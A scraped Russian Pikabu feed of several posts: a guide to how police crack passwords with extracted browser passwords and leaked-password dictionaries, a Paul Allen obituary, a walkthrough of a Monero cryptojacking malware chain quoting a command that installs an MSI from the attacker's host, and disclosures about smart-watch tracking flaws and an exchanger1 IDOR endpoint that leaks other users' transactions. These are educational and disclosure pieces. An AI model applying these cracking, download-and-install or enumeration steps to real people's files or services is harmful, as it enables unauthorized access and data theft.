Сколько у тебя паролей?

Я подсчитал: у меня 83 уникальных пароля. Насколько они на самом деле уникальны — разговор отдельный; пока просто запомним, что у меня их 83. А вот у среднего пользователя уникальных паролей гораздо меньше. По данным опросов, у среднего англоязычного пользователя 27 учетных записей в онлайновых сервисах. Способен ли такой пользователь запомнить 27 уникальных, криптографически сложных паролей? Статистически — не способен. Порядка 60% пользуются десятком паролей плюс их незначительными вариациями (password, password1, ну, так и быть, — Password1234, если сайт требует длинный и сложный пароль). Этим беззастенчиво пользуются спецслужбы.


Если есть доступ к компьютеру подозреваемого, то извлечь из него десяток-другой паролей — вопрос техники и нескольких минут. К примеру, можно воспользоваться программой Elcomsoft Internet Password Breaker, которая вытаскивает пароли из браузеров (Chrome, Opera, Firefox, Edge, Internet Explorer, Yandex) и почтовых клиентов (Outlook, Thunderbird и другие).


В ней можно просто побродить по хранилищам паролей, а можно нажать Export, в результате чего за считаные секунды все доступные пароли будут извлечены из всех поддерживаемых источников и сохранены в текстовый файл (дубликаты удаляются). Вот этот-то текстовый файл и есть готовый словарь, который в дальнейшем используется для вскрытия паролей, которыми зашифрованы файлы с серьезной защитой.

Извлекаем пароли из браузеров и почтовых клиентов

Допустим, у нас есть файл P&L.docx, извлеченный с компьютера пользователя, и есть словарик из его паролей от нескольких десятков (или даже сотни) учетных записей. Попробуем воспользоваться паролями для расшифровки документа. С этим может помочь практически любая программа для перебора паролей, которая поддерживает формат документов MS Office 2013. Нам привычнее Elcomsoft Distributed Password Recovery.


Атака происходит в три этапа. На первом этапе просто подключаем словарь «как есть».

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

Этот этап занимает доли секунды; вероятность успеха «здесь и сейчас» — порядка 60% для среднестатистического пользователя (не хакера, не айтишника и не киберпреступника).


Второй этап — используется тот же словарь, состоящий из паролей пользователя, но в конец каждого пароля дописываются цифры от 0 до 9999.

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

Наконец, третий этап — тот же документ, тот же словарь, но прогоняются вариации («мутации» в терминологии EDPR). На скриншоте можно увидеть список доступных мутаций:

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

Большой соблазн — активировать их все, но практического смысла в этом немного. Имеет смысл изучить, как именно конкретный пользователь выбирает свои пароли и какие именно вариации он использует. Чаще всего это одна или две заглавных буквы (вариация case средней степени), одна или две цифры в произвольных местах пароля (вариация digit средней степени) и год, который чаще всего дописывается в конец пароля (вариация year средней степени). Впрочем, на данном этапе все-таки имеет смысл просмотреть пароли пользователя и учесть вариации, которые использует именно он.


На втором и третьем этапах обычно вскрывается каждый десятый пароль. Итоговая вероятность расшифровать документ у среднего пользователя — порядка 70%, причем время атаки ничтожное, а длина и сложность пароля не имеют ровно никакого значения.


Исключения из правила

Если у одного пользователя файлы и учетные записи защищены одними и теми же паролями, это вовсе не означает, что так везти будет каждый раз. Например, в одном случае подозреваемый хранил пароли в виде имен контактов в телефонной книге, а в другом сборник паролей совпадал с именами зашифрованных файлов. Еще один раз файлы были зашифрованы названиями мест отдыха подозреваемых. Инструментов для автоматизации всех подобных случаев просто не существует: даже имя файла следователю приходится сохранять в словарь вручную.


Длина не имеет значения

Если говорить о длине и сложности паролей, то большинство пользователей не привыкли себя утруждать. Впрочем, даже если бы почти все использовали пароли максимальной длины и сложности, это не повлияло бы на скорость атаки по словарям, составленным из утечек.


Если ты следишь за новостями, то, вероятно, слышал об утечках баз данных с паролями из Yahoo (три раза подряд!), LinkedIn, eBay, Twitter и Dropbox. Эти службы очень популярны; в общей сложности утекли данные десятков миллионов учетных записей. Хакеры проделали гигантскую работу, восстановив из хешей большую часть паролей, а Марк Бёрнетт собрал все утечки воедино, проанализировал ситуацию и сделал интереснейшие выводы. По данным Марка, в том, какие пароли выбирают англоязычные пользователи, прослеживаются четкие закономерности:

0,5% в качестве пароля используют слово password;

0,4% в качестве пароля используют последовательности password или 123456;

0,9% используют password, 123456 или 12345678;

1,6% используют пароль из десятки самых распространенных (top-10);

4,4% используют пароль из первой сотни (top-100);

9,7% используют пароль из top-500;

13,2% используют из top-1000;

30% используют из top-10000.

Дальше Марк не анализировал, но мы продолжили его последовательность, воспользовавшись списком из 10 миллионов самых популярных паролей. По нашим данным, пароли из этого списка использует всего 33% пользователей, а длительность атаки растет на три порядка.


Что нам дает эта информация? Вооружившись статистикой и словариком из

10 тысяч самых распространенных паролей, можно попробовать расшифровать файлы и документы пользователя даже в тех случаях, когда о самом пользователе ничего не известно (или просто не удалось получить доступ к компьютеру и извлечь его собственные пароли). Такая простейшая атака по списку из всего 10 тысяч паролей помогает следствию примерно в 30% случаев.


70 + 30 = 100?

В первой части статьи мы воспользовались для атаки словарем, составленным из паролей самого пользователя (плюс небольшие мутации). Согласно статистике, такая атака работает примерно в 70% случаев. Второй метод — использование списка из top-10000 паролей из онлайновых утечек, что дает, снова согласно статистике, тридцатипроцентную вероятность успеха. 70 + 30 = 100? В данном случае — нет.


Даже если «средний» пользователь использует одни и те же пароли, даже если эти пароли содержатся в утечках, ни о какой гарантии речи не идет. Офлайновые ресурсы, зашифрованные тома и документы могут быть защищены принципиально другими паролями; вероятность этого никто не измерял. При расследовании преступлений, связанных с компьютерами, заметно возрастает вероятность нарваться на пользователя, который не попадает в категорию «средних». Говорить о том, что 30% или 70% паролей любого пользователя вскрываются за несколько минут (априорная вероятность), не совсем корректно. А вот о семидесятипроцентной раскрываемости (апостериорная вероятность) рапортовать можно.


Именно такими, быстрыми, легко автоматизируемыми и неплохо прогнозируемыми способами любят пользоваться правоохранительные органы, если «доброе слово и пистолет» не срабатывают.


На этом всё?

Разумеется, на перечисленных атаках процесс не останавливается. Подключаются собственные словари — как с популярными паролями, так и словари английского и национального языков. Как правило, используются вариации, здесь единого стандарта нет. В ряде случаев не брезгуют и старым добрым brute force: кластер из двадцати рабочих станций, каждая из которых укомплектована четырьмя GTX 1080, — это уже полмиллиона паролей в секунду для формата Office 2013, а для архивов в формате RAR5 и вовсе за два миллиона. С такими скоростями уже можно работать.


Разумеется, пароли к учетным записям, которые можно извлечь из компьютера подозреваемого, далеко не всегда помогут в расшифровке файлов и криптоконтейнеров. В таких случаях полиция не стесняется привлекать и другие методы. Так, в одном случае следователи столкнулись с зашифрованными данными на ноутбуках (системные накопители были зашифрованы с использованием BitLocker Device Protection совместно с модулем TPM2.0).


Атаковать эту защиту «в лоб» бесполезно; никакой пароль в этом случае пользователь не устанавливает. Помог анализ другого устройства, на которое пользователь заходил с помощью той же учетной записи Microsoft Account. После восстановления пароля к Microsoft Account расшифровка системного накопителя стала делом техники. В другом случае данные с зашифрованных ноутбуков были найдены на сервере в незащищенном виде.


Как защититься? В первую очередь проведи аудит своих паролей. Попробуй проделать все то, что показали мы. Удалось взломать пароль к документу, архиву, зашифрованному тому за несколько минут? Делай выводы. Не удалось? Методов мягкого убеждения никто не отменял.
https://t.me/deepernetwork_news

Показать полностью 6
1452

Умер сооснователь Microsoft

Сооснователь крупнейшего мирового разработчика ПО Microsoft Пол Аллен скончался от рецидива рака в возрасте 65 лет. В своё время он убедил Билла Гейтса бросить учёбу в Гарварде, чтобы развивать собственную компанию, пишет Reuters.

Умер сооснователь Microsoft Компьютер, Microsoft, Билл Гейтс, Пол Аллен, Рак, Некролог

Именно Аллен в 1980-м договорился о покупке операционной системы Quick and Dirty Operating System, которая позволила Microsoft начать поставки DOS для первых ПК от IBM. Он ушёл из компании ещё в 1983 году, но оставался членом совета директоров до 2000-го, после чего занимал должность советника.

Умер сооснователь Microsoft Компьютер, Microsoft, Билл Гейтс, Пол Аллен, Рак, Некролог

Доля в компании позволила Аллену всю жизнь пожинать плоды работы Microsoft. Впервые его состояние достигло миллиарда в 1990 году, и с того времени только росло.


Как и Билл Гейтс, Пол Аллен тратил значительную часть своих денег на благотворительность. Общая сумма пожертвований превысила $1,5 млрд. Всего он планировал «раздать» более половины своего 20-миллиардного состояния.


Впрочем, тратил он не только на благотворительность. Компания Пола Аллена создала и запустила первую не принадлежащую государству ракету. Он также основал транспортную компанию Stratolaunch, которая разрабатывает самолёт для вывода объектов на околоземную орбиту. Принадлежащая ему Vulcan Capital инвестировала в многие стартапы, а сам Аллен являлся автором 43 технологических патентов. Кроме этого, Пол Аллен был известным любителем спорта (владел несколькими спортивными командами) и музыки (например, построил музей Джимми Хендрикса).


В 2010 году Аллен пообещал после смерти отдать большую часть своего состояния на благотворительные цели. В 2018 году Аллен занял 44-е место в списке журнала Forbes с состоянием 21,7 миллиарда долларов. Аллен ни разу не был женат.

Показать полностью 1
6372

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Показать полностью 17
4087

Детские смарт-часы и иллюзия безопасности

Вы родитель молодого чада и подумываете о том, что бы купить ему смарт-часы и иметь хоть какой-то контроль над перемещением ребёнка, а так же повысить его безопасность? Но имейте ввиду, что не все устройства выполняют в полной мере функции, возложенные на них. Ниже моя история.


Как отец первокласника, я задумался о том, что бы купить смарт-часы для своего ребёнка. Изучив имеющиеся предложения на рынке, я купил часы Fixitime 3 от российской компании Elari. Ещё бы, их же даже Wylsacom рекомендовал рекламировал.

Вроде бы недешевый гаджет и безопасность данных должна быть на уровне, тем более, когда идёт речь о безопасности детей. Но так как имею некоторые представления о программировании и безопасности мобильных приложений, я полез смотреть трафик последнего. И вот незадача, буквально пол часа спустя я в плане эксперимента смог добавить устройства других детей в своё приложение.

Детские смарт-часы и иллюзия безопасности Fixitime, Elari, Умные часы, Дети, Безопасность, Уязвимость, Длиннопост

Как видно на скриншоте сверху, один ребёнок мой, остальные добавлены произвольным образом.


Теперь, будь я злоумышленником, я бы смог без проблем следить за любым ребёнком, который использует часы этого производителя, а на самом деле любые часы, произведённые китайской компанией Wherecom под разными брендами. О последствиях даже думать не хочется. Для меня стал вопрос, либо возвращать часы продавцу либо пытаться что-то исправить. Я выбрал второй вариант.


Поэтому я написал письма вендеру, китайским разработчикам, в общем тем, кто причастен к созданию и распространению этого чудо-гаджета. Было это не просто, так как на мои сообщения ни кто не хотел отвечать. Так как я живу в Украине, я написал в украинское и в российское представительства Elari, а так же китайским разработчикам сервиса, на сервере которых часы хранят всю информацию. Да, вы правильно поняли, личные данные пользователей отправляются на китайский сервер и что хуже всего, вендор не имеет ни какого контроля над этими данными. Это и не удивительно, ведь в мобильном приложении нет ни какого лицензионного соглашения, а соответственно не прописано, куда передаются ваши личные данные и кто за это будет отвечать. Поэтому, выбирая часы, обращайте на это внимание.


Что же дальше?

Дело движется, но вяло, китайские разработчики неспеша закрывают бреши в безопасности, на которые я им указал, но главная уязвимость всё ещё не закрыта. Вы спросите, а что же Elari? Российское представительство спустя 4 недели мне так и не ответило, а украинскому только и остаётся, что транслировать ответы российского вендора, которые им в свою очередь строчат китайские разработчики.


Деталей уязвимости я по понятным причинам не выкладываю, жду, пока их все не закроют.

Для себя я условно решил дождаться 1-го сентября. Если к тому моменту проблема не решится, буду возвращать часы с фомулировкой, что они не выполняют возложенных на них функций.


Такие вот дела.

С вами был dinikin.

Показать полностью 1
1003

Больше 20 миллионов пользователей используют фальшивые блокировщики рекламы

По мотивам https://pikabu.ru/story/mayner_hanstrackr_v_prilozhenii_chro...

Один из сооснователей и разработчиков AdGuard, Андрей Мешков, опубликовал в блоге компании интересную запись. Он пишет, что из-за плохой модерации Chrome Web Store более 20 млн пользователей установили себе фальшивые блокировщики рекламы и фактически являются участниками ботнета.

Фальшивые блокировщики рекламы, равно как и подделки любых популярных аддонов и приложений, вовсе не редкость. К примеру, осенью 2017 года в официальном Chrome Web Store обнаружили поддельную версию Adblock Plus, которой пользовались порядка 37 000 человек.

Мешков рассказывает, что данная проблема не нова. Мошенники довольно давно размещают в Chrome Web Store клоны популярных блокировщиков (добавляя всего несколько строк собственного кода). В результате пользователи вполне могли установить что-то вроде Adguard Hardline или Adblock Plus Premium или другие имитации. Единственный возможный способ борьбы с подобными фейками — это обратиться к Google с жалобой о неправомерном использовании товарного знака. Удаление клона занимает несколько дней.

По данным AdGuard, в настоящее время ситуация стала хуже, а мошенники умнее. На скриншоте ниже приведены результаты поиска, содержащие подделки. К этим клонам злоумышленники добавили пару строк кода и аналитику, но также употребляют ключевые слова в описании расширений, чтобы оказаться первыми в результатах поиска.

Больше 20 миллионов пользователей используют фальшивые блокировщики рекламы Вирус, Расширение, Adblock, Фейк, Безопасность, Браузер, Длиннопост

Очевидно, что таких простых трюков и пребывания в топе достаточно для завоевания доверия случайных пользователей. К примеру, только у одной из подделок насчитывается более 10 миллионов пользователей.

Больше 20 миллионов пользователей используют фальшивые блокировщики рекламы Вирус, Расширение, Adblock, Фейк, Безопасность, Браузер, Длиннопост

Об исследовании кода можно прочитать тут:

https://blog.adguard.com/ru/bolshie-20-millionov-polzovatiel...

https://xakep.ru/2018/04/20/fake-adblockers/


Так что опасные расширения с именами:

AdRemover for Google Chrome™(10+ млн пользователей);

uBlock Plus(8+ млн пользователей);

Adblock Pro(2+ млн пользователей);

По сути почти все расширения со словом «AdRemover» и «Adblocker» являются потенциально опасными, так как эти ключевые слова используют злоумышленники для поднятия своих фейков в топ.

Так же обратите внимание на превьюшку расширения в Chrome Web Store (скрин 1). У поддельных расширений она зачастую без логотипа и нарисована "на коленке в парке под пивко".


Для того чтобы скачать официальный блокировщик:

AdBlock https://getadblock.com/

ABP  https://adblockplus.org/ru/

uBlock https://www.ublock.org/

AdGuard https://adguard.com/ru/adguard-browser-extension/overview.ht...


Это самое распространенное.

Берегите свои данные и себя!

Показать полностью 1
1708

Безопасность данных? Ладно, уговорили, выключу запись...

По мотивам https://pikabu.ru/story/internet_bank_5695875


Решил я в кой-то веки купить что-то у Microsoft. Оформил платную подписку на один из их продуктов. Привязал свою карточку на сайте, чтобы оттуда списывались деньги раз в месяц. Обычное дело.


Спустя полгода срок моей карты подошёл к концу, и я обновил её в банке. Приходит дата очередной оплаты подписки от MS. Они пытаются снять деньги со старой карты и естественно не могут. Что делает в этом случае обычный пользователь? Правильно, заходит на сайт и обновляет данные карточки за минуту.


Что делает пользователь Microsoft?

Заходит на сайт. Открывает страницу с подпиской. Там честно сказано, что оплата не прошла. ОК. Что делать? А хрен его знает, разбирайся, пользователь, сам...

Потыкавшись по меню, нахожу в своём профиле привязанную карту и кнопку "обновить данные карты". Нажимаю, открывается страница "Выберете, что вы хотите сделать:". "Добавить новую карту" или... а всё, это единственный пункт.

ОК. Добавляю новую карту, вписываю данные, "сохранить"... "Карта с таким номером уже привязана к вашему счёту". Ну это действительно так, ведь у обновлённой карты номер сохранился. Но как мне блин отвязать старую карту?

Прокликал все меню. Ничего про отвязку карты не нашёл. Заходим в справку. Читаем: "Чтобы отвязать карту, откройте страницу [список карт]...". Клац. Ошибка - страница не найдена. Датриждеблядскаяярость.jpg!

Ещё 15 минут поисков и я смог найти несколько страниц меню, которые падают с ошибкой. Как отвязать карту или обновить данные - не нашёл.

Окей... Вроде у них есть живая человеческая техподдержка. Но как с ней связаться? Контактов нигде нет. Иду снова в справку. Открываю помощника и вдруг у меня прямо в Windows запускается приложение "Техническая поддержка". Вот до чего технологии дошли! Но чата в нём нет. Есть только окошко "Опишите проблему", которое пытается найти справочную статью по ключевым словам.

Когда я задолбал эту программу, она вдруг предложила "Скажите свой номер и мы вам перезвоним через минуту". Вот это сервис!


Через минуту звонит милая девушка из техподдержки. Описал ей свою историю. Она даже не удивилась. Сказала лишь "а это нельзя сделать на сайте, вы мне скажите данные новой карты и я их обновлю".  Но... как же... безопасность... никому cvv-код... - подумал я, но уже настолько заебался, что согласился.

Девушка была не лыком шита и кое-что понимала в безопасности данных, поэтому она сказала "Подождите! Пока не говорите! Сейчас я отключаю запись разговора... ...всё! Диктуйте данные карты!".


Ну а дальше ничего интересного, сказал ей данные карты и она починила мне подписку. Морали нет. Вот так работает одна из самых крупных компаний-производителей софта в мире.

876

Тыжпрограммист-фрилансер в медицинском центре

Эта история навеяна мемуарами тыжпрограммиста с компьютером в странной комнате с кафельными стенами.
Был я в одном таком "кабинете". Попросили прийти вирусы почистить, да устранить жуткие тормоза, а то работать невозможно. Говорят, ходят тут всякие, пользуются тем что это единственный кабинет, в котором нет камер, заходят в браузер, гуглят всякую похабщину и без разбора по всяким ссылкам тыкают ... Сразу подумал на ночных охранников. Не будут же сотрудники в рабочее время так палиться. Я посмотрел: ну да, действительно, в истории браузера одни ***хабы да ***тюбы. Еще и кабинет такой странный: кафельный, с раковиной и маленьким столиком на длинной ножке и провод к компу идет... Как они сказали, это какие-то лабораторные спец весы, работу которых ни в коем случае нельзя нарушить. Почистил, поудалял зловредов. Иду и сообщаю что все готово, можно работу принимать. А там как раз мужика какого-то инструктируют... И тут я краем уха слышу как ему говорят куда проходить для сдачи анализов семенной жидкости... И тут я пожалел что работал без перчаток...

108

Уязвимость exchanger1

Уязвимость exchanger1 Уязвимость, Web, Хакеры, Взлом, Xss, Injection, Exchanger1, Безопасность, Длиннопост

В этой статье, я опишу весьма интересную с точки зрения логики находку.

Я дал людям на фикс 30 дней. Увы, благодарить администрация не умеет )


Часть 1



Я говорю о безопасности пользователей в общем.


Часть полученного вознаграждения я вывел используя ваш обменник.


Мне стало забавно почитать о вашем проекте подробнее и я наткнулся на "https://exchanger1.com/page/about" .


Пункт 4 вкладки "Безопасность работы с нами", говорит нам о защите любых данных пользователей. (Все это гарантирует сохранность любых данных пользователей на нашем сайте.)



Весьма громкое заявление !


Учитывая все факторы, я обнаружил весьма серьезную уязвимость в системе помощи пользователям.


Злоумышленник может получать доступ к тикетам и писать в них от имени администрации!


также можно просто закрыть тикет.


Неправильное разграничение привилегий может нести за собой большие последствия...



Часть 2



В результате исследования модуля помощи клиентам, также была найдена уязвимость в реализации api.


Злоумышленник может Деанонимизировать транзакции пользователя.


Рабочий пример:


Я перебрал транзакции пользователей по номеру тикета.


https://pix.my/o/8a9Tvk?1513363007


Получился достаточно большой результат.


транзакция на обмен 300$ пренадлежит автору тикета N-320014. (


23:00 21.11.2017 )


По номеру тикета, api выдает нам информацию кодированную в Unicode.


Полученная транзакция в свою очередь содержит суммы переводов.



Пример расшифровки ответа api на транзакцию 320014:



{"error":false,"_content":{"#trx-status":"<h5>


<small>Статус:</small> Завершена</h5>


<div class="description">


<a href="/exchange/status/8661199">Заявка № 8 661 199</a>


</div>


<div class="exchange-error">


<div class="money-error">


<span class="first-currency">300,00</span>



<div class="image-wrapper">


<img class="currency_logo"


src="/bundles/x2face/images/currency/advcash.png"


height="27" width="27" alt="#">


</div>


<span class="money">USD</span>


</div>


<div class="money-error">


<span class="second-currency">7 800,00</span>



<div class="image-wrapper">


<img class="currency_logo"


src="/bundles/x2face/images/currency/visamaster.png"


height="24" width="24" alt="#">


</div>


<span class="money">UAH</span>


</div>


</div>


<div class="time-money">


<a class="btn small status" href="#" data-exec="jQuery(this).closest('form').trigger('submit');">Проверить статус</a>


</div>exchanger_pm"}}



Техническая и детальная информация:



1) для получения доступа к чужому тикету, злоумышленнику достаточно заменить идентификатор.


Злоумышленник может от имени администрации попросить пользователя выслать ту или иную информацию.



2) для получения транзакции по id тикета, злоумышленику достаточно совершить GET запрос на:


https://exchanger1.com/profile/tickets/history/{$ID}/status


позже декодировать полученную информацию.



Простой вектор атаки:


найти транзакцию и получить ее сумму.(используя баг в api)
